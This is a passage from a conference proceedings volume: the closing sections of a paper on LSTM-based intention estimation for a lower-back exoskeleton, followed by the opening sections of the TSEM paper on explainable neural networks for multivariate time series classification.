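In a pipeline like the one described, only the angle about the axis of interest (for example yaw for the leg sensors) would then be kept as a feature.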
4.4
Performance Metric
The angle prediction for controlling the lower-back exoskeleton was performed by the deep learning model. The model's goal was to minimize the mean squared error between the true and predicted angles of the main rotations. Therefore, to measure the performance of our proposed approach we use two popular performance measures, namely the mean squared error (MSE) and the coefficient of determination (R²), calculated as in Eqs. 7 and 8. The plot of the MSE is shown in Fig. 13.

$$ MSE = \frac{1}{n} \sum_{i=1}^{n} (y_i - \hat{y}_i)^2, \tag{7} $$

$$ R^2 = 1 - \frac{SS_{res}}{SS_{tot}}, \tag{8} $$

where $SS_{res}$ is the residual sum of squares and $SS_{tot}$ is the total sum of squares.
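Both metrics of Eqs. (7) and (8) can be computed directly with NumPy. The sketch below is a generic illustration, with $SS_{tot}$ taken as the sum of squared deviations of the true values from their mean.

```python
import numpy as np


def mse(y_true, y_pred):
    """Mean squared error, Eq. (7)."""
    return float(np.mean((y_true - y_pred) ** 2))


def r2(y_true, y_pred):
    """Coefficient of determination, Eq. (8)."""
    ss_res = np.sum((y_true - y_pred) ** 2)         # residual sum of squares
    ss_tot = np.sum((y_true - y_true.mean()) ** 2)  # total sum of squares
    return float(1.0 - ss_res / ss_tot)
```

For true values 1, 2, 3, 4 and predictions 1, 2, 3, 5, the residual sum of squares is 1 and the total sum of squares is 5, so the MSE is 0.25 and R² is 0.8.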
5
Results and Discussion
The experiment involved 20 people (6 females and 14 males) aged from 20 to 38 years. Each participant performed the exercise from 20 to 40 times, for 15 to 20 s each time. In total, 700 samples were collected, providing around 3.3 h of data. Figure 11 shows some of the participants during the experiments.
Fig. 11. Some of the participants of the experiments. All participants authorized the use of these photos
For the training data, time series were recorded in which a person stood still and then intended to lift the load. Each person squatted in their own style, at different speeds and at different times. The resulting varied dataset was collected and processed. Figure 12 presents some examples of samples from the collected data, on which the neural network was trained to predict the following angles. The data shows that each person does the exercise in their own style. For example, person 3 in Fig. 12 squats more than they bend their back, whereas person 2 bends more, lifting the load by tilting their back. Therefore, the neural network works independently of the physiological characteristics of each individual and does not require re-training for a specific user of an exoskeleton (Table 2).
Fig. 12. Examples of training data from the collected dataset, showing the change in the main orientation angles during a lifting task
Table 2. Proposed model performance
Dataset partition  Total samples  MSE   R2
Train              455            0.66  0.999
Validation         140            0.7   0.998
Test               105            0.3   0.994
For training, the data was divided into 15 segments in order to predict the next 5 segments, and the model took as input a six-component vector corresponding to the rotations. The coefficient of determination of the model is 0.998 on the validation set (Fig. 14) and 0.994 on the test set (Table 2), which indicates a good fit. To detect movement, the data points were taken in a sliding window of size 5 and the absolute gradient of the line of best fit was calculated; a gradient greater than 0.5 means that the person is moving. The first gradient greater than 0.5 marks the start of the movement, and the last gradient greater than 0.5 marks its end. Fig. 15 presents the performance of our approach on the test data. The error is no more than 4°. Note that the proposed model will not work well if the sensors are not located properly. The error in the predicted data can be reduced by conducting a larger number of experiments and retraining the model on a larger number of subjects. It is worth noting that the data was collected only inside a building, which limits the variety of the dataset, since activity in an elevator or an airplane was not taken into account. In such scenarios, additional forces act on the accelerometer sensors, and in some applications it may be important to take this into account. The source code is available online.1
1 https://github.com/Demilaris/human intention.
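The windowing and the movement detection described above can be sketched as follows. This is one possible reading of the text, not the published code: 15 consecutive time steps of the six rotation angles are taken as input and the next 5 steps as target, and movement is detected from the absolute slope of a least-squares line fitted to each window of 5 points. The function names are hypothetical.

```python
import numpy as np


def make_windows(angles, n_in=15, n_out=5):
    """Split a (T, 6) angle series into (input, target) pairs of consecutive steps."""
    inputs, targets = [], []
    for start in range(len(angles) - n_in - n_out + 1):
        inputs.append(angles[start:start + n_in])
        targets.append(angles[start + n_in:start + n_in + n_out])
    return np.array(inputs), np.array(targets)


def movement_bounds(signal, window=5, threshold=0.5):
    """Start indices of the first and last window whose best-fit slope exceeds the threshold."""
    t = np.arange(window)
    slopes = np.array([
        abs(np.polyfit(t, signal[i:i + window], 1)[0])  # slope of the fitted line
        for i in range(len(signal) - window + 1)
    ])
    moving = np.flatnonzero(slopes > threshold)
    if moving.size == 0:
        return None  # no movement detected
    return int(moving[0]), int(moving[-1])
```

A 30-step recording yields 11 input/target pairs with the default sizes. The returned bounds are window start indices, so the actual end of the movement lies up to `window - 1` samples after the second index.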
Fig. 13. The MSE loss for training and validation set
Fig. 14. The coefficient of determination (R2 ) for training and validation set
Fig. 15. The predicted and true trajectory of human motion during lifting tasks where black lines denote the beginning of the movement
6
Conclusion
In this paper we propose a method of human intention estimation with a wearable robotics costume based on IMU sensors, using a deep learning approach. The purpose of this work is to increase the versatility of exoskeletons and to apply advanced automatic control to them. A hardware costume was built and experiments were conducted. The data was collected, segmented, and preprocessed, and the features were selected and extracted. The obtained dataset for evaluating human intentions was used for training a deep learning model. As a result, we obtain an MSE of 0.3 and an R² of 0.994. For prediction we used an LSTM model with rotation angles in degrees as input. Our approach shows a good result, with an average error of only 4°. We examined the error and found that it occurs at the peaks of the values. The real-time delay does not exceed 50 ms. Moreover, we published our dataset for human activity recognition and intention estimation for everyone to use. In the future, the performance of our deep recurrent model can be improved by increasing the number of experiments and adding regularization, which will reduce over-fitting.
References
1. Badawi, A.A., Al-Kabbany, A., Shaban, H.: Multimodal human activity recognition from wearable inertial sensors using machine learning. In: 2018 IEEE-EMBS Conference on Biomedical Engineering and Sciences (IECBES), pp. 402–407. IEEE (2018)
2. Chereshnev, R., Kertész-Farkas, A.: HuGaDB: human gait database for activity recognition from wearable inertial sensor networks. In: van der Aalst, W.M.P., et al. (eds.) AIST 2017. LNCS, vol. 10716, pp. 131–141. Springer, Cham (2018). https://doi.org/10.1007/978-3-319-73013-4_12
3. Fang, B., et al.: Gait neural network for human-exoskeleton interaction. Front. Neurorobot. 14, 58 (2020)
4. Ghazal, S., Khan, U.S., Mubasher Saleem, M., Rashid, N., Iqbal, J.: Human activity recognition using 2D skeleton data and supervised machine learning. Inst. Eng. Technol. 13 (2019)
5. Ionescu, C., Papava, D., Olaru, V., Sminchisescu, C.: Human3.6M: large scale datasets and predictive methods for 3D human sensing in natural environments. IEEE Trans. Pattern Anal. Mach. Intell. 36, 1325–1339 (2014)
6. Khandelwal, S., Wickström, N.: Evaluation of the performance of accelerometer-based gait event detection algorithms in different real-world scenarios using the MAREA gait database. Gait Posture 51, 84–90 (2017)
7. Kingma, D.P., Ba, J.: Adam: a method for stochastic optimization. arXiv preprint arXiv:1412.6980 (2014)
8. Kwon, H., et al.: IMUTube: automatic extraction of virtual on-body accelerometry from video for human activity recognition. Proc. ACM Interact. Mob. Wearable Ubiquitous Technol. 4(3), 1–29 (2020)
9. Madgwick, S., et al.: An efficient orientation filter for inertial and inertial/magnetic sensor arrays. Report x-io Univ. Bristol (UK) 25, 113–118 (2010)
10. Mak, S.K.D., Accoto, D.: Review of current spinal robotic orthoses. In: Healthcare, no. 1, p. 70. MDPI (2021)
11. Manns, P., Sreenivasa, M., Millard, M., Mombaur, K.: Motion optimization and parameter identification for a human and lower back exoskeleton model. IEEE Robot. Autom. Lett. 2, 1564–1570 (2017)
12. Martinez, J., Black, M.J., Romero, J.: On human motion prediction using recurrent neural networks. In: Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 2891–2900 (2017)
13. Milenkoski, M., Trivodaliev, K., Kalajdziski, S., Jovanov, M., Stojkoska, B.R.: Real time human activity recognition on smartphones using LSTM networks. In: 2018 41st International Convention on Information and Communication Technology, Electronics and Microelectronics (MIPRO), pp. 1126–1131. IEEE (2018)
14. Näf, M.B., Koopman, A.S., Baltrusch, S., Rodriguez-Guerrero, C., Vanderborght, B., Lefeber, D.: Passive back support exoskeleton improves range of motion using flexible beams. Frontiers in Robotics and AI, p. 72 (2018)
15. Poliero, T., et al.: A case study on occupational back-support exoskeletons versatility in lifting and carrying. In: The 14th PErvasive Technologies Related to Assistive Environments Conference, pp. 210–217 (2021)
16. Poliero, T., Mancini, L., Caldwell, D.G., Ortiz, J.: Enhancing back-support exoskeleton versatility based on human activity recognition. In: 2019 Wearable Robotics Association Conference (WearRAcon), pp. 86–91. IEEE (2019)
17. Radivojac, P., White, M.: Machine Learning Handbook (2019)
18. Reiss, A., Stricker, D.: Creating and benchmarking a new dataset for physical activity monitoring. In: Proceedings of the 5th International Conference on PErvasive Technologies Related to Assistive Environments, pp. 1–8 (2012)
19. Roveda, L., Savani, L., Arlati, S., Dinon, T., Legnani, G., Tosatti, L.M.: Design methodology of an active back-support exoskeleton with adaptable backbone-based kinematics. Int. J. Ind. Ergon. 79, 102991 (2020)
20. Sasiadek, J.Z.: Sensor fusion. Annu. Rev. Control 26(2), 203–228 (2002)
21. Shotton, J., et al.: Real-time human pose recognition in parts from single depth images. In: CVPR 2011, pp. 1297–1304. IEEE (2011)
22. Sousa Lima, W., Souto, E., El-Khatib, K., Jalali, R., Gama, J.: Human activity recognition using inertial sensors in a smartphone: an overview. Sensors 19(14), 3213 (2019)
23. Toxiri, S., et al.: Back-support exoskeletons for occupational use: an overview of technological advances and trends. IISE Trans. Occup. Ergon. Hum. Factors 7(34), 237–249 (2019)
24. Wang, H., Zhang, R., Li, Z.: Research on gait recognition of exoskeleton robot based on DTW algorithm. In: Proceedings of the 5th International Conference on Control Engineering and Artificial Intelligence, pp. 147–152 (2021)
25. Wang, J., Chen, Y., Hao, S., Peng, X., Hu, L.: Deep learning for sensor-based activity recognition: a survey. Pattern Recognit. Lett. 119, 3–11 (2019)
26. Yadav, S.K., Tiwari, K., Pandey, H.M., Akbar, S.A.: Skeleton-based human activity recognition using ConvLSTM and guided feature learning. Soft Comput. 26(2), 877–890 (2022)
27. Zhang, M., Sawchuk, A.A.: USC-HAD: a daily activity dataset for ubiquitous activity recognition using wearable sensors. In: Proceedings of the 2012 ACM Conference on Ubiquitous Computing, pp. 1036–1043 (2012)
TSEM: Temporally-Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series
Anh-Duy Pham(B), Anastassia Kuestenmacher, and Paul G. Ploeger
Hochschule Bonn-Rhein-Sieg, Sankt Augustin, Germany
[email protected], {anastassia.kuestenmacher,paul.ploeger}@h-brs.de
Abstract. Deep learning has become a one-size-fits-all solution for technical and business domains thanks to its flexibility and adaptability. It is implemented using opaque models, which unfortunately undermines the outcome's trustworthiness. In order to have a better understanding of the behavior of a system, particularly one driven by time series, a look inside a deep learning model, provided by so-called post-hoc eXplainable Artificial Intelligence (XAI) approaches, is important. There are two major types of XAI for time series data: model-agnostic and model-specific. The model-specific approach is considered in this work. While other approaches employ either Class Activation Mapping (CAM) or an attention mechanism, we merge the two strategies into a single system, simply called the Temporally Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series (TSEM). TSEM combines the capabilities of RNN and CNN models in such a way that RNN hidden units are employed as attention weights for the temporal axis of the CNN feature maps. The results show that TSEM outperforms XCM. It is similar to STAM in terms of accuracy, while also satisfying a number of interpretability criteria, including causality, fidelity, and spatiotemporality.
Keywords: Temporally-weighted · Explainability · Attention · CNN · RNN · Spatiotemporality · Multivariate time series classification
1
·
Introduction
Multivariate time series analysis is used in many sensor-based industrial applications. Several advanced machine learning algorithms have achieved state-of-the-art classification accuracy in this field, but they are opaque because they encode important properties in fragmented, impenetrable intermediate layers. In Fig. 1, the positions of the cat and the dog are clear, but the signal from the three sensors is perplexing, even with explanations. This is perilous because adversarial attacks can exploit this confusion by manipulating the inputs with intentional noise to trick the classification model into yielding a wrong decision. Multivariate time series (MTS) are challenging to classify due to the underlying multi-dimensional link among elemental properties. As Industry 4.0 develops, sensor systems are incorporated into production and operational systems to monitor processes and automate repetitive tasks. Hence, given the high accuracy of multivariate time series classification algorithms, it is crucial to understand the precise rationale for their conclusions, particularly in precision manufacturing or operations such as autonomous driving. This is where interpretable techniques become useful.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 183–204, 2023. https://doi.org/10.1007/978-3-031-28073-3_13
Fig. 1. Explanations given by gradient-based class activation mapping method
Interpretable AI methods fall into three main categories: interpretable-by-design, model-agnostic, and model-specific. Interpretable-by-design models are built with the intention of giving an explanation. Although they include classical methods such as decision trees and general linear models, they still contribute to novel interpretable applications, for example through graph neural networks [19], a decision tree [17], comparison with archetypal instances [5], conditioning neurons to interpretable properties [11,13], and statistically accounting for evidence from various image patches [3]. Model-agnostic and model-specific explainable methods, on the other hand, are applied to models that are not interpretable by design. Model-agnostic techniques can be applied to any predictive model, while model-specific methods are tied to a particular model class. In this work, only model-specific interpretable methods are analyzed. Regardless of whether a method is model-agnostic or model-specific, explanations can be extracted from a model in two ways [10]: post-hoc analysis, which explains the decision of a model by analyzing its output, and ante-hoc analysis, which provides an explanation as part of the decision. This research analyzes Class Activation Mapping (CAM)-based approaches, which give post-hoc explanations for the output of a Convolutional Neural Network (CNN), and attention-based Recurrent Neural Networks (RNNs), whose attention vectors serve as ante-hoc explanations.
This study proposes the Temporally Weighted Spatiotemporal Explainable Network for Multivariate Time Series (TSEM), a novel method that overcomes several shortcomings of previous interpretations. It uses an RNN, placed in a parallel branch of the network, to extract global temporal features from the input and applies them as an importance weight vector to the CNN-generated spatiotemporal feature maps. We show that our method can fix the locality of the explanations along the temporal axis yielded by 1D convolutional layers, while also improving the overall performance of the model, because the temporal information is now weighted directly into the feature maps rather than merely serving as supplementary information, as is the case in XCM [7]. The saliency maps are then extracted from the weighted feature maps by CAM methods. Although CAM gives only local fidelity with CNN saliency maps, attention neural models are unable to provide consistent explanations for classification RNN models when compared to CAM explanations [12]. Apart from being faithful, such an explanation should satisfy two additional assessment criteria, namely spatiotemporal explainability and causality [9].
The rest of this paper is arranged as follows. Section 2 summarizes recent research on transparency in the realm of MTS classification. Section 3 explains the novel TSEM architecture and how its outputs should be interpreted. Section 4 details the experiments and methods of assessment. Section 5 summarizes the method's accomplishments and offers more perspectives on how to improve it.
2 Related Work
2.1 Attention Neural Models
Because an RNN layer learns long-term correlations between the values of a time series efficiently, it may be kept in a neural network to retain information over an extended period of time, enabling more precise classification. Interpretability is then provided by wrapping an attention neural model around the RNN layer to obtain additional information about the time series region of interest, which may also improve the learning of the RNN layer. In addition, the attention neural model may feed back into the coupled RNN layer, instructing it to highlight the most important data. Numerous MTS classification and regression models of this kind have been published. This family of architectures begins with the Reverse Time Attention Model (RETAIN) [6], which utilizes a two-layer neural attention model in reverse time order to emphasize the most recent time steps. The Dual-Stage Attention-Based Recurrent Neural Network (DA-RNN) [20] adopts the concept of RETAIN but without the temporal order reversal, while the Dual-Stage Two-Phase attention-based Recurrent Neural Network (DSTP-RNN) [15] advances DA-RNN by dividing the spatial attention stage into two substages, or two phases. The Multi-level attention networks for geo-sensory time series (GeoMAN) [14] similarly has two stages of attention, but in the spatial stage it incorporates two parallel states: the local one correlates intra-sensory interactions, while the global one correlates inter-sensory ones. Spatiotemporal attention for multivariate time series prediction (STAM) [9] focuses primarily on temporal feature extraction by assigning two attention vectors with independent RNN wrappers while decreasing the number of phases in the spatial attention stage to one.
2.2 Post-Hoc Model-Specific Convolutional Neural Network-Based Models
An LSTM layer is designed to learn the intercorrelation between values along the time dimension, which is always a one-dimensional sequence; hence, the layer can be replaced by a one-dimensional convolutional layer. Using this concept, Assaf et al. [1] created the Multivariate Time Sequence Explainable Convolutional Neural Network (MTEX-CNN), a serial two-stage convolutional neural network consisting of a series of Conv2D layers coupled to a series of 1D convolutional (Conv1D) layers. Fauvel et al. [7] instead linked the two convolutional modules in parallel, believing that this would give an extra temporal interpretation for the network's predictions. The resulting eXplainable Convolutional Neural Network for Multivariate Time Series Classification (XCM) provides a faithful local explanation of the model's predictions as well as high overall accuracy. Furthermore, as its authors show, the CNN-based structure allows the model to converge faster than an RNN-based structure while also having less variation across epochs. In their paper [7], XCM also achieved state-of-the-art performance. By switching from a serial to a parallel framework, XCM considerably improved on the performance of MTEX-CNN. Specifically, both the 1D and 2D modules receive the input data directly; as a result, the extracted features are tied more closely to the input than if they were taken from another module. However, XCM combines the two types of information, the spatial and temporal features, by concatenating the temporal one as an additional feature vector to the spatial feature map and then using another Conv1D layer to learn the association between the temporal map and the spatial map, as shown in Fig. 2.
This approach has two limitations. (1) The intermediate feature map has the shape (feature length + 1, time length), and the explanation map derived from it has the same shape. This is out of sync with the shape of the input data, which is (feature length, time length). (2) Although the final Conv1D layer is assumed to learn the relationship within the concatenated map, a Conv1D layer can only extract local features, whereas temporal features require long-term dependencies to achieve a more accurate correlation between time steps. To address these issues, TSEM makes better use of the temporal features: rather than appending them, it multiplies them with the spatial (in effect spatiotemporal) feature maps produced by the 2D convolutional (Conv2D) layers, and it replaces the Conv1D layers with an LSTM layer, whose output is better suited to weighting the spatiotemporal feature maps.
2.3 Explanation Extraction by Class Activation Mapping
Class Activation Mapping (CAM) methods determine which input characteristics are accountable for a certain classification result. This is accomplished by performing backpropagation from the output logits to the desired layer to extract the activation or saliency maps of the relevant features, and then interpolating these maps to the input size to emphasize the accountable ones. CAM [25] is the original approach, which uses a global average pooling layer to link the final convolutional layer with the logits layer so that the responsible features can be identified directly from the latter. CAM has since become the general name for this strategy, which is further classified into two groups besides the original method: gradient-based CAM and score-based CAM. The gradient-based CAM group consists of algorithms that backpropagate the gradient from the logits layer in order to weight the feature maps of the associated convolutional layer. They include Grad-CAM [22], Grad-CAM++ [4], Smooth Grad-CAM++ [18], XGrad-CAM [8], and Ablation-CAM [21], and are distinguished by how they formulate the weights from the backpropagated gradients. In contrast, score-based approaches such as Score-CAM [24], Integrated Score-CAM [16], Activation-Smoothed Score-CAM [23], and Input-Smoothed Score-CAM [23] employ the logits to directly weight the feature maps of the convolutional layer of interest. They vary in how they combine the scores and feature maps through multiplication.
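The gradient-based weighting described above can be sketched in a few lines. The following is a minimal illustration in the style of Grad-CAM, not the implementation used in this work: the function name `grad_cam` and the nested-list representation of the maps are assumptions made for the example, and the gradients are taken as given rather than computed by backpropagation.

```python
def grad_cam(feature_maps, gradients):
    """Grad-CAM-style saliency map (illustrative sketch).

    feature_maps, gradients: lists of K maps, each a nested list with
    the same number of rows and columns. gradients[k] holds the gradient
    of the class score with respect to feature_maps[k].
    """
    num_rows = len(feature_maps[0])
    num_cols = len(feature_maps[0][0])
    # One weight per feature map: the gradient averaged over all positions.
    weights = [
        sum(sum(row) for row in grad) / (num_rows * num_cols)
        for grad in gradients
    ]
    # Weighted sum of the feature maps.
    saliency = [[0.0] * num_cols for _ in range(num_rows)]
    for weight, fmap in zip(weights, feature_maps):
        for r in range(num_rows):
            for c in range(num_cols):
                saliency[r][c] += weight * fmap[r][c]
    # ReLU keeps only the positions that support the class.
    return [[max(0.0, value) for value in row] for row in saliency]
```

In practice the resulting map would still be interpolated to the input size, as the text describes; that step is omitted here to keep the sketch short.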
3 Methodology
XCM uses a basic CNN designed to extract features related to the variables and timestamps of the input data. This ensures that the model decision explained using Grad-CAM [22] is interpreted faithfully. On a variety of UEA datasets, XCM beats state-of-the-art techniques for MTS classification [2]. Since faithfulness evaluates the relationship between the explanation and what the model computes, it is critical when describing a model to its end-user. The purpose of this study is to develop a small yet scalable and explainable CNN model that is true to its prediction. The combination of a CNN architecture with Grad-CAM enables the creation of designs with few parameters while maintaining accuracy and transparency. MTEX-CNN demonstrated this by proposing a serial connection of Conv2D and Conv1D layers for the purpose of extracting essential characteristics from MTS. To address the above-mentioned drawbacks of CNN post-hoc explanations, TSEM takes the backbone of the XCM architecture and improves it by replacing the Conv1D module in the second parallel branch, which comprises two Conv1D layers, with a single recurrent layer, as previously stated. The time window aspect of the model has also been retained since it aids in scaling the model to a fraction of the input size when the data dimensions are too large. Figure 3 depicts the overall architecture.
Fig. 2. XCM architecture [7]. Abbreviations: BN—Batch Normalization, D—Number of Observed Variables, F—Number of Filters, T—Time Series Length and Window Size—Kernel Size, which corresponds to the time window size
Fig. 3. TSEM architecture. Abbreviations: BN—Batch Normalization, D—Number of Observed Variables, F—Number of Filters, T—Time Series Length and Window Size—Kernel Size, which corresponds to the time window size.
Formally, the input MTS is fed simultaneously into two branches, one for each of its two dimensions, spatial and temporal. The spatial branch is designed to extract the spatial information spanning the constituent time series by first applying a convolutional filter with a customized kernel size in which one side is fixed to the length of the temporal axis of the MTS. This reduces the number of model parameters and increases training and inference speed. It is followed by a 1×1 Conv2D layer that collapses the preceding filters into a single filter, so that the resulting feature map has the same shape as the input. The idea was proposed by Fauvel et al. [7] in their XCM architecture and is kept as the backbone of our architecture, TSEM. In the temporal branch, since a separate temporal explanation is redundant when the first branch can already extract a spatiotemporal explanation, the Conv1D module is replaced with an LSTM module whose number of hidden units equals the window size hyperparameter. The substitution sacrifices the explainability of the Conv1D module in exchange for improved temporal features, because the LSTM module treats the time series signal as a continuous input rather than a discrete one, as the convolution does. The LSTM output is then upsampled to the original time length and multiplied element-wise with the feature maps from the first branch's two-dimensional convolutional module instead of being concatenated, as in the temporal branch of XCM (Fig. 2). This results in time-weighted spatiotemporal forward feature maps from which the explanation map can be retrieved by different CAM-based techniques. Additionally, the new feature map is expected to improve accuracy compared to XCM.
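The temporal weighting step described above can be illustrated with a small sketch. It assumes that the recurrent branch has already produced one weight per hidden unit and that the upsampling is linear interpolation; the text does not state the interpolation mode, so that choice, like the helper names `upsample_linear` and `weight_feature_map`, is hypothetical.

```python
def upsample_linear(values, target_len):
    """Linearly interpolate a 1-D list of weights to target_len points."""
    if len(values) == 1:
        return [values[0]] * target_len
    if target_len == 1:
        return [values[0]]
    scale = (len(values) - 1) / (target_len - 1)
    out = []
    for t in range(target_len):
        pos = t * scale
        lo = min(int(pos), len(values) - 2)  # left neighbour index
        frac = pos - lo                      # distance from the left neighbour
        out.append(values[lo] * (1 - frac) + values[lo + 1] * frac)
    return out


def weight_feature_map(feature_map, temporal_weights):
    """Multiply every row of a D x T feature map by per-time-step weights.

    feature_map: D rows (variables) of T values (time steps).
    temporal_weights: weights from the recurrent branch (assumed given),
    upsampled to length T before the element-wise product.
    """
    num_steps = len(feature_map[0])
    weights = upsample_linear(temporal_weights, num_steps)
    return [[row[t] * weights[t] for t in range(num_steps)]
            for row in feature_map]
```

Because the weights are multiplied in rather than appended, the weighted map keeps the shape (D, T) of the input, which avoids the (D + 1, T) mismatch noted for concatenation.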
4 Experiments and Evaluation
The assessment entails conducting tests for critical metrics that an interpretation should adhere to, as recommended and used in several works on interpretable or post-hoc interpretability approaches.
4.1 Baselines
TSEM is compared with all of the attention neural models and post-hoc model-specific CNN-based models outlined in Sects. 2.1 and 2.2. These include five attention neural models, namely RETAIN, DA-RNN, DSTP-RNN, GeoMAN and STAM, and some of their possible variants, along with MTEX-CNN and XCM, the two model-specific interpretable models. Note that in the interpretability tests, the post-hoc analysis of MTEX-CNN and XCM is supplied by each of the explanation extraction techniques described in Sect. 2.3, which are also compared with one another.
4.2 Accuracy
Before examining why a model produced a given output, it is necessary to establish that the model predicts accurately. Inherently and post-hoc interpretable models must therefore be assessed on their capacity to attain high accuracy on the same set of datasets so that their performance can be compared objectively. As indicated before, XCM has demonstrated its performance, and that of MTEX-CNN, on classification tasks using the UEA archive of diverse MTS datasets [2]. The comparisons use model accuracy as the assessment measure, and a table of accuracies is generated for each of the experimental models over all datasets in the UEA archive. Additionally, a critical difference chart is constructed to illustrate the performance of each model more intuitively by aligning the models along a line marked with the difference level derived from the reported accuracy table.
Datasets. The UEA multivariate time series classification archive [2] has 30 datasets that span six categories, including Human Activity Recognition, Motion Classification, ECG Classification, EEG/MEG Classification, and Audio Spectra Classification. As with other dataset sources, the archive was a collaborative effort between academics at the University of California, Riverside (UCR) and the University of East Anglia (UEA). All the time series within one dataset have the same length, and no missing or infinite values occur.
Accuracy Metrics. After training on the aforementioned datasets, each model is assessed using the following accuracy score:
$$\mathrm{Accuracy} = \frac{TP + TN}{TP + FP + TN + FN}, \tag{1}$$
where TP, FP, TN and FN are abbreviations for True Positive, False Positive, True Negative, and False Negative, respectively. The numerator (TP + TN) denotes the number of predictions that equal the actual class, while FP and FN count the predictions that do not equal the true class. Following that, the average score is used to generate a Critical Difference Diagram that depicts any statistically significant difference between the architectures. It is created using Dunn's test, a nonparametric technique for determining which means differ significantly from the others. Dunn's test establishes a null hypothesis, in which no difference exists between groups, and an alternative hypothesis, in which a difference exists between groups.
4.3 Interpretability
Despite developing interpretable CNN-based architectures and using Grad-CAM for interpretation, MTEX-CNN and XCM evaluate their explainability using only a percentage Average Drop metric and a human comprehensibility test on trivial simulation data. Most of the significant tests of CAM-based explanations are carried out in the works that propose the CAM-based techniques themselves. Score-CAM [24] assesses its approach on the most comprehensive collection of trials, merged from the other methods, which is to be expected given the method's recent publication. The assessments include metrics for evaluating faithfulness, such as Increase of Confidence, percent Average Drop, percent Average Increase, and Insertion/Deletion curves; metrics for evaluating localization, such as the energy-based pointing game; and finally, a sanity check that examines the change in the visualization map when a random set of feature maps is used. By contrast, attention-based RNN techniques are primarily concerned with studying the spatiotemporal properties of the attention. As with the percent Average Drop, several approaches (DA-RNN, DSTP-RNN, and STAM) perform an ablation experiment by examining the difference between the unattended and original multivariate time series data. Thus, a single set of interpretability evaluation trials should gather all the tests dispersed across these methodologies to serve as a baseline for comparing the effectiveness of the interpretations produced by each approach in the area of MTS classification. This includes human visual inspection, fidelity of the explanations to the model parameters, spatiotemporality of the explanation, and causality of the explanation in relation to the model parameters. Because the assessment is based on the interpretation of a given model prediction, the chosen model must be trained to at least chance-level accuracy before an explanation is extracted from it. Since the explanation for attention-based models is intrinsic to the model parameters, explanations can be retrieved exclusively for the output class, but this is not the case with CAM-based approaches. Additionally, to keep the interpretations clear, the interpretation process should be conducted on a single dataset with a maximum of three component time series. Thus, UWaveGestureLibrary is chosen for interpretability evaluation.
Faithfulness. The evaluations in this class test whether the features that an explanation mechanism identifies are consistent with the outcomes of the model. They consist of two sub-classes, namely Average Drop/Average Increase and the Deletion/Insertion AUC score. Average Drop and Average Increase are treated together as one measure because they both test the same aspect of an explanation's faithfulness to the model parameters, whereas the Deletion/Insertion AUC score analyzes a different aspect. According to [4], given $Y_i^c$ as the prediction of class $c$ on image $i$ and $O_i^c$ as the prediction of class $c$ on image $i$ masked by the interpretation map, the Average Drop is defined as in Eq. 2 [24], whereas the Average Increase, also called the Increase of Confidence, is computed using Eq. 3.
$$\mathrm{AverageDrop}(\%) = \frac{1}{N} \sum_{i=1}^{N} \frac{\max(0,\, Y_i^c - O_i^c)}{Y_i^c} \times 100 \tag{2}$$
$$\mathrm{AverageIncrease}(\%) = \sum_{i=1}^{N} \frac{\mathrm{Sign}(Y_i^c < O_i^c)}{N} \times 100 \tag{3}$$
where Sign is the function that converts Boolean values to their binary counterparts of 0 and 1. As the names of these measures imply, an interpretability method performs well when the Average Drop percentage is low and the Average Increase percentage is high. The Deletion and Insertion AUC scores are intended to be used in conjunction with the Average Drop and Average Increase measurements. The deletion metric reflects the decrease in the predicted class's probability as more and more of the pixels that the generated saliency map marks as crucial are removed. A steep decline in the curve of prediction score against deletion percentage, equivalent to a small area under the curve (AUC), indicates a plausible explanation. On the other hand, the insertion measure captures the increase in probability as more relevant pixels are added, with a larger AUC implying a more complete explanation [24].
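As a worked illustration of Eqs. 2 and 3 and of the area under a deletion or insertion curve, the sketch below computes the three quantities from plain lists of class scores. The function names are hypothetical, the original scores are assumed to be strictly positive, and the curve is assumed to be sampled at evenly spaced fractions between 0 and 1.

```python
def average_drop(original, masked):
    """Average Drop (%), Eq. 2: mean relative decrease of the class score.

    original[i] is the class score on input i, masked[i] the score on the
    same input masked by the interpretation map. Scores must be > 0.
    """
    total = sum(max(0.0, y - o) / y for y, o in zip(original, masked))
    return 100.0 * total / len(original)


def average_increase(original, masked):
    """Average Increase (%), Eq. 3: share of inputs whose score rises."""
    hits = sum(1 for y, o in zip(original, masked) if y < o)
    return 100.0 * hits / len(original)


def curve_auc(scores):
    """Trapezoidal area under a deletion or insertion curve.

    scores[k] is the class score after removing (or inserting) a fraction
    k / (len(scores) - 1) of the most salient positions.
    """
    step = 1.0 / (len(scores) - 1)
    return sum((a + b) / 2.0 * step for a, b in zip(scores, scores[1:]))
```

For example, with original scores `[0.8, 0.5, 0.4]` and masked scores `[0.4, 0.6, 0.4]`, only the first input drops (by half of its score) and only the second rises, so the Average Drop is 50/3 percent and the Average Increase is 100/3 percent.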
Causality. A causality test commonly assigns random values to the causes and observes how the effects respond. Randomization can thus provide several pieces of evidence that point to a causal link. Here, the feature vectors of the input are randomized one by one in a cascading manner until all of the feature vectors of the input data are completely randomized. The time dimension is randomized in the same way, up to the final time point. Each randomized input is then fed into the interpretable models to extract its interpretation matrix, which is correlated with the original explanation to see how far it deviates from it. If the interpretation does not change from the original one, the causal link may be broken, since the interpretation is then invariant to the input data. The correlation values between the explanations of the randomized inputs and the original explanation without randomization serve as the quantitative evaluation of the tests. A divergence of the correlations produced by the same interpretable technique over the cascading stages, shown by a drop in the correlation coefficients, can be taken as evidence of a causal relationship. The Chi-square goodness-of-fit test is used to determine whether the divergence is significant enough to distinguish the interpretations obtained under randomization from the initial interpretation map. The null hypothesis is that there is no difference between the two, in other words that the correlation between the original explanation and the explanation of the randomized data is 1, while the alternative hypothesis is that the correlation differs from 1. The Chi-square statistic is defined as
$$\chi^2 = \sum_{i} \frac{(O_i - E_i)^2}{E_i}, \tag{4}$$
where $O_i$ denotes the observed value, which in this case is the correlation of the interpretations obtained by input randomization, and $E_i$ is the expected value, which is 1, indicating a perfect match with the original interpretation map. All of the data in the test set of UWaveGestureLibrary is evaluated in this manner, and the number of samples minus one is the degree of freedom for the Chi-square test.
